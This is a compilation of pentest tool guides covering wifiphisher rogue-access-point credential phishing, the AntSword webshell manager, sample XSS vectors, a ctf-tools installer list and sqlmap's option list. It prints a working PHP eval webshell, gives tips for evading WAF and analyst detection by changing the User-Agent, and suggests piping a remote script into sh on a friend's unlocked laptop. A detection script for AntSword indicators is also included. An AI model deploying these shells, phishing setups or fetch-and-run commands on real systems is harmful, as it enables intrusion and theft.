wifiphisher – Man-in-the-middle attack software for WiFi

Wifiphisher is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing. Using Wifiphisher, penetration testers can easily achieve a man-in-the-middle position against wireless clients by performing targeted Wi-Fi association attacks. Wifiphisher can be further used to mount victim-customized web phishing attacks against the connected clients in order to capture credentials (e.g. from third party login pages or WPA/WPA2 Pre-Shared Keys) or infect the victim stations with malware. [1] [2]


In Kali Linux, we can use the following command to install wifiphisher:

sudo apt install wifiphisher

or install it from git:

git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python setup.py install



1 Launch wifiphisher on the wireless interface (wlan0 in this example):

wifiphisher -i wlan0

2 Use the Up/Down arrow keys to navigate through the access points and hit Enter to select one.


3 We will be asked which scenario to use:

wifiphisher - Available Phishing Scenarios

4 If we select “2 – Firmware Upgrade Page”, a monitoring screen appears. Wifiphisher monitors for devices that are trying to connect to a non-existent network, creates a fake version of that network, and tricks them into connecting.

(When the victim has submitted the password, we will be notified in wifiphisher.)

A successful attack

5 After the victim has joined, they will be asked to enter the Wi-Fi password.

Fake router configuration page asking for wifi password

(Other fake login screens)

Fake OAuth Login Page
Fake web-based network manager

Then the attack ends and the captured password is displayed on the screen.

Attack ends, password shown


[1] https://wifiphisher.org

[2] https://github.com/wifiphisher/wifiphisher

AntSword – a Security Tool for Post Exploitation


AntSword is a very easy-to-use post-exploitation tool for pentesters and security groups; it can also be used by webmasters etc. Do not use this tool on unauthorized servers/environments or for illegal purposes. It can be a better alternative to Weevely.

Description from the official website:

AntSword is an open source, cross-platform website administration tool, being designed to meet the needs of penetration testers together with security researchers with permissions and/or authorizations as well as webmasters.
Anyone shall not use it for illegal purposes and profitability. Besides that, publishing unauthorized modified version is also prohibited, or otherwise bear legal responsibilities.

1 Installation

1.1 Download the correct zip file

The AntSword-Loader (the launcher) can be downloaded here: https://github.com/AntSwordProject/AntSword-Loader

It can be used on Microsoft Windows, Linux and macOS platforms.

Windows AntSword

1.2 Install or unzip the content

Here, we unzip to “C:\Users\win10\Desktop\as-4.0.3”

Unzip AntSword

1.3 Launch “AntSword.exe”


1.4 Click on the “Initialize” button

1.5 Select a working directory

In this example, we create a working directory named “working-dir” under the main directory, i.e. “C:\Users\win10\Desktop\as-4.0.3\working-dir”.

Select the folder, then click on the “Select folder” button.

It will start to download the necessary package (“antSword-master.zip”).

(You might encounter the following error.)

Unzip Error Code: [object Object]


If you encounter this error, follow 1.5.1.

1.5.1 Fix the error

Open the working directory we have just selected; a folder named “antSword-master” and a zip file named “antSword-master.zip” may be there. Delete them.

1.5.2 Launch the AntSword-Loader with administrator rights, then repeat Steps 1.3 to 1.5.

We should be able to see the following screen:

download successful Extracting file...

When it’s done:

Set up successful Please manually restart later!

Then this window disappears and the program terminates by itself.

1.6 Now we can launch “AntSword.exe” again; it is ready to be used.

2 Simple usage demonstration

First, we need to deploy a webshell (sometimes called a backdoor or Trojan).

In this example we are going to use PHP.

2.1 Create a php file “test.php”

2.2 Save following content to “test.php” file

<?php eval($_POST['mytestshell']); ?>

2.3 Upload to your own testing server (Please do not test on production server or any server which does not belong to you)

2.4 Right-click on the blank space, then click on “Add”

2.5 Enter the correct server details:

Shell url: the URL of your test.php

Shell pwd: the shell password, i.e. the key used in $_POST (“mytestshell” in this case)

Shell type: PHP

2.6 Click on “Add” button

Add Shell

2.7 Now it will appear under “Shell Lists”

Shell Lists

2.8 Double-click on the item; we can now see all files on the server (as long as the user running the server process has the corresponding privileges)

View folders, files on the server

We can even upload and download files to/from the selected folder, create, modify and delete files and folders, and even open a terminal.

AntSword connected to WebShell

3 Other

It also supports other shell types besides PHP.

Add shell - Shell type

Send customized HTTP header/body values

Add shell - HTTP Header, Body

Other settings

Add shell - Other

Proxy, Plugin Store, Encoder, etc.


AntSword official documentation: https://doc.u0u.us/en/getting_started/first_shell.html

Bonus 1 – Use AntSword with a PHP GET request

Wonder how to use AntSword with $_GET rather than $_POST in PHP?

Here is how:

The PHP file:

Rather than

<?php eval($_POST['mytestshell']); ?>

We use

<?php eval($_GET['mytestshell']); ?>

The settings in AntSword:

Shell url: http://xxxxxxxxxx.com/test.php?mytestshell=eval($_POST['mypswd']);

Shell pwd: mypswd

Bonus 2 – Modify User-Agents

By default, AntSword uses “antSword/v2.1” or “antSword/v2.0” as the User-Agent when updating the webshell information or connecting to the webshell, which can easily be recognized by a WAF or a human analyst.

To change the User-Agent for AntSword:

There are 2 files and 3 places we need to modify.

b2.1.1 File 1 is “request.js” under “X:\path\to\antsword\working-dir\antSword-master\modules\request.js”

Note: “working-dir” was created during Step 1.5

b2.1.2 Open “request.js” in Notepad or any text editor, then search for “USER_AGENT”

b2.1.3 Change “antSword/v2.1” to whatever you like, then save the file

b2.2.1 File 2 is “update.js” under “X:\path\to\antsword\working-dir\antSword-master\modules\update.js”

b2.2.2 Open “update.js” in Notepad or any text editor, then search for “User-Agent”

b2.2.3 Change “antSword/v2.0” to whatever you like, then save the file
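A defender-side check for the indicators this write-up names: the default antSword/v2.x User-Agent from Bonus 2, the eval($_POST['...']) query-string form from Bonus 1, and the eval($_POST[...]) one-liner from Section 2. This is an added example, not AntSword's code; the combined-format access-log lines and the PHP snippet are constructed, and the log regex assumes Apache/nginx combined format.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple
from urllib.parse import unquote_plus

# Default User-Agent prefix AntSword sends (the page names antSword/v2.1 and
# antSword/v2.0); matching the prefix, case-insensitively, covers both.
ANTSWORD_UA_PREFIX = "antsword/"

# The webshell shape from section 2 / Bonus 1: eval() fed straight from a request
# superglobal. The same pattern matches the PHP file and the Bonus 1 query string.
EVAL_SUPERGLOBAL_RE = re.compile(
    r"eval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\s*\[", re.IGNORECASE
)

# Assumption: access log in Apache/nginx "combined" format.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


@dataclass
class Finding:
    line_no: int
    reason: str
    path: str


def analyze_log_line(line_no: int, line: str) -> Optional[Finding]:
    """Return a Finding if one access-log line carries an AntSword indicator."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    if not m:
        return None
    ua, path = m.group("ua"), m.group("path")
    # Indicator 1: the tool's default User-Agent. Weak on its own, since Bonus 2
    # shows it is a two-line edit to change, so the scan does not rely on it alone.
    if ua.lower().startswith(ANTSWORD_UA_PREFIX):
        return Finding(line_no, f"default AntSword User-Agent {ua!r}", path)
    # Indicator 2: Bonus 1 moves the shell password into the query string as
    # eval($_POST['...']); decode it first so %24 / %5B do not hide the pattern.
    query = unquote_plus(path.partition("?")[2])
    if EVAL_SUPERGLOBAL_RE.search(query):
        return Finding(line_no, "eval() of a request superglobal in query string", path)
    # The default POST form (section 2) travels in the request body, which the
    # combined log format does not record; pair this scan with scan_php_source().
    return None


def scan_access_log(lines: Iterable[str]) -> List[Finding]:
    findings: List[Finding] = []
    for line_no, line in enumerate(lines, start=1):
        f = analyze_log_line(line_no, line)
        if f:
            findings.append(f)
    return findings


def scan_php_source(source: str) -> List[Tuple[int, str]]:
    """Return (line number, stripped line) for each eval-of-superglobal in a PHP file."""
    return [
        (n, ln.strip())
        for n, ln in enumerate(source.splitlines(), start=1)
        if EVAL_SUPERGLOBAL_RE.search(ln)
    ]


# Constructed sample data (not real traffic): a default-UA request, a Bonus 1
# style GET with the changed User-Agent from Bonus 3, and an ordinary request.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2020:12:00:01 +0000] "POST /test.php HTTP/1.1" 200 512 "-" "antSword/v2.1"',
    '203.0.113.5 - - [10/Mar/2020:12:00:02 +0000] "GET /test.php?mytestshell=eval(%24_POST%5B%27mypswd%27%5D)%3B HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36"',
    '198.51.100.7 - - [10/Mar/2020:12:00:03 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "curl/7.68.0"',
]

# Constructed PHP file with the same shape as the page's test.php.
SAMPLE_PHP = "<?php\n// constructed sample, same shape as test.php above\neval($_POST['mytestshell']);\n?>\n"

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"log line {f.line_no}: {f.reason} ({f.path})")
    for n, ln in scan_php_source(SAMPLE_PHP):
        print(f"php line {n}: {ln}")
```

The User-Agent match alone is easy to defeat once the tool's UA is edited, which is why the query-string and file-content checks carry the weight.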

Bonus 3 – Latest User-Agents


Chrome:

on Windows

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

on Linux

Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

on macOS

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

on Android

Mozilla/5.0 (Linux; Android 8.0.0;) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Mobile Safari/537.36

on iOS

Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/80.0.3987.95 Mobile/15E148 Safari/605.1


Firefox:

on Windows

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/74.0

on Linux

Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/74.0

on macOS

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/74.0

on Android

Mozilla/5.0 (Android 8.0.0; Mobile; rv:61.0) Gecko/61.0 Firefox/68.0

on iOS

Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/23.0 Mobile/16B92 Safari/605.1.15

IE 11/Internet Explorer 11 on Windows 10

Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko

Edge on Windows 10

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Edg/80.0.361.62


YandexBot crawler:

Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)

There are many more features we can utilize, including encoding/decoding (very helpful when trying to evade a Web Application Firewall (WAF)), plugins, multipart payloads, etc.

Warning: Do not use or test this tool on unauthorised servers.

Cross-site scripting (XSS) cheat sheet from PortSwigger

onactivate (IE)

<a id=x tabindex=1 onactivate=alert(1)></a>

onafterprint (Chrome, Firefox, IE)

<body onafterprint=alert(a)>


The cheat sheet contains many vectors that can help you bypass WAFs and filters. You can select vectors by event, tag or browser, and a proof of concept is included for every vector. The cheat sheet is regularly updated.

More can be found on the official website:

Official website

PDF version download

Capture The Flag (CTF) – Tools

(Some of the tools are quite old but can still be useful though)

Collection of setup scripts to create an install of various security research tools. Of course, this isn’t a hard problem, but it’s really nice to have them in one place that’s easily deployable to new machines and so forth. The install-scripts for these tools are checked regularly, the results can be found on the build status page.

Installers for the following tools are included:

Category   Type      Tool                  Description
binary     Directory afl                   State-of-the-art fuzzer.
binary     Directory angr                  Next-generation binary analysis engine from Shellphish.
binary     Directory barf                  Binary Analysis and Reverse-engineering Framework.
binary     Directory bindead               A static analysis tool for binaries.
binary     Library   capstone              Multi-architecture disassembly framework.
binary     Directory checksec              Check binary hardening settings.
binary     Directory codereason            Semantic Binary Code Analysis Framework.
binary     Directory crosstool-ng          Cross-compilers and cross-architecture tools.
binary     Directory cross2                A set of cross-compilation tools from a Japanese book on C.
binary     Directory elfkickers            A set of utilities for working with ELF files.
binary     Directory elfparser             Quickly determine the capabilities of an ELF binary through static analysis.
binary     Directory evilize               Tool to create MD5 colliding binaries.
binary     Directory gdb                   Up-to-date gdb with python2 bindings.
binary     Directory gdb-heap              gdb extension for debugging heap issues.
binary     Directory gef                   Enhanced environment for gdb.
binary     Directory honggfuzz             A general-purpose, easy-to-use fuzzer with interesting analysis options.
binary     Library   keystone              Lightweight multi-architecture assembler framework.
binary     Directory libheap               gdb python library for examining the glibc heap (ptmalloc).
binary     Library   lief                  Library to Instrument Executable Formats.
binary     Directory miasm                 Reverse engineering framework in Python.
binary     Directory one_gadget            Magic gadget search for libc.
binary     Directory panda                 Platform for Architecture-Neutral Dynamic Analysis.
binary     Directory pathgrind             Path-based, symbolically-assisted fuzzer.
binary     Directory peda                  Enhanced environment for gdb.
binary     Directory preeny                A collection of helpful preloads (compiled for many architectures!).
binary     Directory pwndbg                Enhanced environment for gdb. Especially for pwning.
binary     Directory pwntools              Useful CTF utilities.
binary     Directory python-pin            Python bindings for pin.
binary     Directory qemu                  Latest version of qemu!
binary     Directory qira                  Parallel, timeless debugger.
binary     Directory radare2               Some crazy thing crowell likes.
binary     Directory rappel                A linux-based assembly REPL.
binary     Directory ropper                Another gadget finder.
binary     Directory rp++                  Another gadget finder.
binary     Directory rr                    Record and Replay Debugging Framework.
binary     Directory scratchabit           Easily retargetable and hackable interactive disassembler.
binary     Directory scratchablock         Yet another crippled decompiler project.
binary     Directory seccomp-tools         Provides powerful tools for seccomp analysis.
binary     Directory shellnoob             Shellcode writing helper.
binary     Directory shellsploit           Shellcode development kit.
binary     Directory snowman               Cross-architecture decompiler.
binary     Directory taintgrind            A valgrind taint analysis tool.
binary     Library   unicorn               Multi-architecture CPU emulator framework.
binary     Directory valgrind              A Dynamic Binary Instrumentation framework with some built-in tools.
binary     Directory villoc                Visualization of heap operations.
binary     Directory virtualsocket         A nice library to interact with binaries.
binary     Directory wcc                   The Witchcraft Compiler Collection is a collection of compilation tools to perform binary black magic on the GNU/Linux and other POSIX platforms.
binary     Directory xrop                  Gadget finder.
binary     Directory manticore             Manticore is a prototyping tool for dynamic binary analysis, with support for symbolic execution, taint analysis, and binary instrumentation.
forensics  Directory binwalk               Firmware (and arbitrary file) analysis tool.
forensics  Directory dislocker             Tool for reading Bitlocker encrypted partitions.
forensics  Directory firmware-mod-kit      Tools for firmware packing/unpacking.
forensics  apt       foremost              File carver.
forensics  Directory pdf-parser            Tool for digging in PDF files.
forensics  Directory peepdf                Powerful Python tool to analyze PDF documents.
forensics  Directory scrdec                A decoder for encoded Windows Scripts.
forensics  Directory testdisk              Testdisk and photorec for file recovery.
crypto     Directory cribdrag              Interactive crib dragging tool (for crypto).
crypto     Directory fastcoll              An md5sum collision generator.
crypto     Directory foresight             A tool for predicting the output of random number generators. To run, launch “foresee”.
crypto     Directory featherduster         An automated, modular cryptanalysis tool.
crypto     Directory galois                A fast galois field arithmetic library/toolkit.
crypto     Directory hashkill              Hash cracker.
crypto     Directory hashpump              A tool for performing hash length extension attacks.
crypto     Directory hashpump-partialhash  Hashpump, supporting partially-unknown hashes.
crypto     Directory hash-identifier       Simple hash algorithm identifier.
crypto     Directory libc-database         Build a database of libc offsets to simplify exploitation.
crypto     Directory littleblackbox        Database of private SSL/SSH keys for embedded devices.
crypto     Directory msieve                Msieve is a C library implementing a suite of algorithms to factor large integers.
crypto     Directory nonce-disrespect      Nonce-Disrespecting Adversaries: Practical Forgery Attacks on GCM in TLS.
crypto     Directory pemcrack              SSL PEM file cracker.
crypto     Directory pkcrack               PkZip encryption cracker.
crypto     Directory python-paddingoracle  Padding oracle attack automation.
crypto     Directory reveng                CRC finder.
crypto     Directory ssh_decoder           A tool for decoding ssh traffic. You will need ruby1.8 from https://launchpad.net/~brightbox/+archive/ubuntu/ruby-ng to run this. Run with ssh_decoder --help for help, as running it with no arguments causes it to crash.
crypto     Directory sslsplit              SSL/TLS MITM.
crypto     Directory xortool               XOR analysis tool.
crypto     Directory yafu                  Automated integer factorization.
web        Directory burpsuite             Web proxy to do naughty web stuff.
web        Directory commix                Command injection and exploitation tool.
web        Directory dirb                  Web path scanner.
web        Directory dirsearch             Web path scanner.
web        Directory mitmproxy             CLI Web proxy and python library.
web        Directory sqlmap                SQL injection automation engine.
web        Directory subbrute              A DNS meta-query spider that enumerates DNS records, and subdomains.
stego      apt       pngtools              PNG analysis tool.
stego      Directory sound-visualizer      Audio file visualization.
stego      Directory steganabara           Another image steganography solver.
stego      Directory stegdetect            Steganography detection/breaking tool.
stego      Docker    stego-toolkit         A docker image with dozens of steg tools.
stego      Directory stegsolve             Image steganography solver.
stego      Directory stegosaurus           A steganography tool for embedding arbitrary payloads in Python bytecode (pyc or pyo) files.
stego      Directory zsteg                 Detect stegano-hidden data in PNG & BMP.
dsniff     apt       dsniff                Grabs passwords and other data from pcaps/network streams.
android    Directory apktool               Dissect, dis-assemble, and re-pack Android APKs.
android    Directory android-sdk           The android SDK (adb, emulator, etc).
misc       Directory xspy                  Tiny tool to spy on X sessions.
misc       Directory z3                    Theorem prover from Microsoft Research.
misc       Directory jdgui                 Java decompiler.
misc       Directory veles                 Binary data analysis and visualization tool.
misc       Directory youtube-dl            Latest version of the popular youtube downloader.

There are also some installers for non-CTF stuff to break the monotony!

Category            Tool              Description
C magic             C-bind            A library used to enable function binding in C!
game                Dwarf Fortress    Something to help you relax after a CTF!
pyvmmonitor         pyvmmonitor       PyVmMonitor is a profiler with a simple goal: being the best way to profile a Python program.
library collection  single_file_libs  A large collection of useful single file include libraries written for C/C++
dolphin             sudolphin         If your friend ever leaves their laptop unlocked, curl -sSL sh.sudolph.in | sh then wait and see!
tor-browser         tor-browser       Useful when you need to hit a web challenge from different IPs.


To use, do:

# set up the path
/path/to/ctf-tools/bin/manage-tools setup
source ~/.bashrc
# list the available tools
manage-tools list
# install gdb, allowing it to try to sudo install dependencies
manage-tools -s install gdb
# install pwntools, but don't let it sudo install dependencies
manage-tools install pwntools
# install qemu, but use "nice" to avoid degrading performance during compilation
manage-tools -n install qemu
# uninstall gdb
manage-tools uninstall gdb
# uninstall all tools
manage-tools uninstall all
# search for a tool
manage-tools search preload

Where possible, the tools keep the installs very self-contained (i.e., in the tool/ directory), and most uninstalls are just calls to git clean (NOTE, this is NOT careful; everything under the tool directory, including whatever you were working on, is blown away during an uninstall). One exception to this is python tools, which are installed using the pip package manager if possible. A ctftools virtualenv is created during the manage-tools setup command and can be accessed using the command workon ctftools.


Something not working? I didn’t write (almost) any of these tools, but hit up #ctf-tools on freenode if you’re desperate. Maybe some kind soul will help!

Docker (version 1.7+)

By popular demand, a Dockerfile has been included. You can build a docker image with:

git clone https://github.com/zardus/ctf-tools
cd ctf-tools
docker build -t ctf-tools .

And run it with:

docker run -it ctf-tools

The built image will have ctf-tools cloned and ready to go, but you will still need to install the tools themselves (see above).

Alternatively, you can also pull ctf-tools (with some tools preinstalled) from dockerhub:

docker run -it zardus/ctf-tools


Vagrant

You can build a Vagrant VM with:

wget https://raw.githubusercontent.com/zardus/ctf-tools/master/Vagrantfile
vagrant plugin install vagrant-vbguest
vagrant up

And connect to it via:

vagrant ssh

Kali Linux

Kali Linux (Sana and Rolling) pins certain libraries to versions other than the latest available (sometimes years out of date), which causes some tools not to install at all, or to fail in strange ways. AFL and Panda come to mind; in fact, any tool that uses QEMU 2.30 will probably fail during compilation under Kali. Overriding these libraries breaks other tools included in Kali, so your only solution is either to live with some of Kali’s tools being broken, or to run another distribution separately, such as Ubuntu.

Most tools aren’t affected though.

Adding Tools

To add a tool (say, named toolname), do the following:

  1. Create a toolname directory.
  2. Create an install script.
  3. (optional) If special uninstall steps are required, create an uninstall script.

Install Scripts

The install script will be run with $PWD being toolname. It should install the tool into this directory, in as contained a manner as possible. Ideally, full uninstallation should be possible with a git clean.

The install script should create a bin directory and put its executables there. These executables will be automatically linked into the main bin directory for the repo. They could be launched from any directory, so don’t make assumptions about the location of $0!


The individual tools are all licensed under their own licenses. As for ctf-tools itself, it is licensed under the BSD 2-Clause License. If you find it useful, star it on GitHub (https://github.com/zardus/ctf-tools).



Open source automatic SQL injection & database takeover tool

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, through data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.



git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev


Get a list of basic options and switches:

python sqlmap.py -h

Get a list of all options and switches:

python sqlmap.py -hh

Official User Manual

Usage: python sqlmap.py [options]
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)
  Target:
    At least one of these options has to be provided to define the
    -d DIRECT           Connection string for direct database connection
    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -l LOGFILE          Parse target(s) from Burp or WebScarab proxy log file
    -m BULKFILE         Scan multiple targets given in a textual file
    -r REQUESTFILE      Load HTTP request from a file
    -g GOOGLEDORK       Process Google dork results as target URLs
    -c CONFIGFILE       Load options from a configuration INI file
  Request:
    These options can be used to specify how to connect to the target URL
    --method=METHOD     Force usage of given HTTP method (e.g. PUT)
    --data=DATA         Data string to be sent through POST (e.g. "id=1")
    --param-del=PARA..  Character used for splitting parameter values (e.g. &)
    --cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
    --cookie-del=COO..  Character used for splitting cookie values (e.g. ;)
    --load-cookies=L..  File containing cookies in Netscape/wget format
    --drop-set-cookie   Ignore Set-Cookie header from response
    --user-agent=AGENT  HTTP User-Agent header value
    --random-agent      Use randomly selected HTTP User-Agent header value
    --host=HOST         HTTP Host header value
    --referer=REFERER   HTTP Referer header value
    -H HEADER, --hea..  Extra header (e.g. "X-Forwarded-For:")
    --headers=HEADERS   Extra headers (e.g. "Accept-Language: fr\nETag: 123")
    --auth-type=AUTH..  HTTP authentication type (Basic, Digest, NTLM or PKI)
    --auth-cred=AUTH..  HTTP authentication credentials (name:password)
    --auth-file=AUTH..  HTTP authentication PEM cert/private key file
    --ignore-code=IG..  Ignore (problematic) HTTP error code (e.g. 401)
    --ignore-proxy      Ignore system default proxy settings
    --ignore-redirects  Ignore redirection attempts
    --ignore-timeouts   Ignore connection timeouts
    --proxy=PROXY       Use a proxy to connect to the target URL
    --proxy-cred=PRO..  Proxy authentication credentials (name:password)
    --proxy-file=PRO..  Load proxy list from a file
    --tor               Use Tor anonymity network
    --tor-port=TORPORT  Set Tor proxy port other than default
    --tor-type=TORTYPE  Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))
    --check-tor         Check to see if Tor is used properly
    --delay=DELAY       Delay in seconds between each HTTP request
    --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
    --retries=RETRIES   Retries when the connection timeouts (default 3)
    --randomize=RPARAM  Randomly change value for given parameter(s)
    --safe-url=SAFEURL  URL address to visit frequently during testing
    --safe-post=SAFE..  POST data to send to a safe URL
    --safe-req=SAFER..  Load safe HTTP request from a file
    --safe-freq=SAFE..  Test requests between two visits to a given safe URL
    --skip-urlencode    Skip URL encoding of payload data
    --csrf-token=CSR..  Parameter used to hold anti-CSRF token
    --csrf-url=CSRFURL  URL address to visit for extraction of anti-CSRF token
    --force-ssl         Force usage of SSL/HTTPS
    --hpp               Use HTTP parameter pollution method
    --eval=EVALCODE     Evaluate provided Python code before the request (e.g.
                        "import hashlib;id2=hashlib.md5(id).hexdigest()")
  Optimization:
    These options can be used to optimize the performance of sqlmap
    -o                  Turn on all optimization switches
    --predict-output    Predict common queries output
    --keep-alive        Use persistent HTTP(s) connections
    --null-connection   Retrieve page length without actual HTTP response body
    --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)
  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts
    -p TESTPARAMETER    Testable parameter(s)
    --skip=SKIP         Skip testing for given parameter(s)
    --skip-static       Skip testing parameters that not appear to be dynamic
    --param-exclude=..  Regexp to exclude parameters from testing (e.g. "ses")
    --dbms=DBMS         Force back-end DBMS to provided value
    --dbms-cred=DBMS..  DBMS authentication credentials (user:password)
    --os=OS             Force back-end DBMS operating system to provided value
    --invalid-bignum    Use big numbers for invalidating values
    --invalid-logical   Use logical operations for invalidating values
    --invalid-string    Use random strings for invalidating values
    --no-cast           Turn off payload casting mechanism
    --no-escape         Turn off string escaping mechanism
    --prefix=PREFIX     Injection payload prefix string
    --suffix=SUFFIX     Injection payload suffix string
    --tamper=TAMPER     Use given script(s) for tampering injection data
  Detection:
    These options can be used to customize the detection phase
    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)
    --string=STRING     String to match when query is evaluated to True
    --not-string=NOT..  String to match when query is evaluated to False
    --regexp=REGEXP     Regexp to match when query is evaluated to True
    --code=CODE         HTTP code to match when query is evaluated to True
    --text-only         Compare pages based only on the textual content
    --titles            Compare pages based only on their titles
  Techniques:
    These options can be used to tweak testing of specific SQL injection
    --technique=TECH    SQL injection techniques to use (default "BEUSTQ")
    --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)
    --union-cols=UCOLS  Range of columns to test for UNION query SQL injection
    --union-char=UCHAR  Character to use for bruteforcing number of columns
    --union-from=UFROM  Table to use in FROM part of UNION query SQL injection
    --dns-domain=DNS..  Domain name used for DNS exfiltration attack
    --second-url=SEC..  Resulting page URL searched for second-order response
    --second-req=SEC..  Load second-order HTTP request from file
    -f, --fingerprint   Perform an extensive DBMS version fingerprint
  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables. Moreover you can run your own SQL statements
    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --hostname          Retrieve DBMS server hostname
    --is-dba            Detect if the DBMS current user is DBA
    --users             Enumerate DBMS users
    --passwords         Enumerate DBMS users password hashes
    --privileges        Enumerate DBMS users privileges
    --roles             Enumerate DBMS users roles
    --dbs               Enumerate DBMS databases
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --count             Retrieve number of entries for table(s)
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    --search            Search column(s), table(s) and/or database name(s)
    --comments          Check for DBMS comments during enumeration
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate
    -X EXCLUDE          DBMS database identifier(s) to not enumerate
    -U USER             DBMS user to enumerate
    --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
    --pivot-column=P..  Pivot column name
    --where=DUMPWHERE   Use WHERE condition while table dumping
    --start=LIMITSTART  First dump table entry to retrieve
    --stop=LIMITSTOP    Last dump table entry to retrieve
    --first=FIRSTCHAR   First query output word character to retrieve
    --last=LASTCHAR     Last query output word character to retrieve
    --sql-query=QUERY   SQL statement to be executed
    --sql-shell         Prompt for an interactive SQL shell
    --sql-file=SQLFILE  Execute SQL statements from given file(s)
  Brute force:
    These options can be used to run brute force checks
    --common-tables     Check existence of common tables
    --common-columns    Check existence of common columns
  User-defined function injection:
    These options can be used to create custom user-defined functions
    --udf-inject        Inject custom user-defined functions
    --shared-lib=SHLIB  Local path of the shared library
  File system access:
    These options can be used to access the back-end database management
    system underlying file system
    --file-read=FILE..  Read a file from the back-end DBMS file system
    --file-write=FIL..  Write a local file on the back-end DBMS file system
    --file-dest=FILE..  Back-end DBMS absolute filepath to write to
  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system
    --os-cmd=OSCMD      Execute an operating system command
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC
    --os-smbrelay       One click prompt for an OOB shell, Meterpreter or VNC
    --os-bof            Stored procedure buffer overflow exploitation
    --priv-esc          Database process user privilege escalation
    --msf-path=MSFPATH  Local path where Metasploit Framework is installed
    --tmp-path=TMPPATH  Remote absolute path of temporary files directory
  Windows registry access:
    These options can be used to access the back-end database management
    system Windows registry
    --reg-read          Read a Windows registry key value
    --reg-add           Write a Windows registry key value data
    --reg-del           Delete a Windows registry key value
    --reg-key=REGKEY    Windows registry key
    --reg-value=REGVAL  Windows registry key value
    --reg-data=REGDATA  Windows registry key value data
    --reg-type=REGTYPE  Windows registry key value type
  General:
    These options can be used to set some general working parameters
    -s SESSIONFILE      Load session from a stored (.sqlite) file
    -t TRAFFICFILE      Log all HTTP traffic into a textual file
    --batch             Never ask for user input, use the default behavior
    --binary-fields=..  Result fields having binary values (e.g. "digest")
    --check-internet    Check Internet connection before assessing the target
    --crawl=CRAWLDEPTH  Crawl the website starting from the target URL
    --crawl-exclude=..  Regexp to exclude pages from crawling (e.g. "logout")
    --csv-del=CSVDEL    Delimiting character used in CSV output (default ",")
    --charset=CHARSET   Blind SQL injection charset (e.g. "0123456789abcdef")
    --dump-format=DU..  Format of dumped data (CSV (default), HTML or SQLITE)
    --encoding=ENCOD..  Character encoding used for data retrieval (e.g. GBK)
    --eta               Display for each output the estimated time of arrival
    --flush-session     Flush session files for current target
    --forms             Parse and test forms on target URL
    --fresh-queries     Ignore query results stored in session file
    --har=HARFILE       Log all HTTP traffic into a HAR file
    --hex               Use hex conversion during data retrieval
    --output-dir=OUT..  Custom output directory path
    --parse-errors      Parse and display DBMS error messages from responses
    --preprocess=PRE..  Use given script(s) for preprocessing of response data
    --repair            Redump entries having unknown character marker (?)
    --save=SAVECONFIG   Save options to a configuration INI file
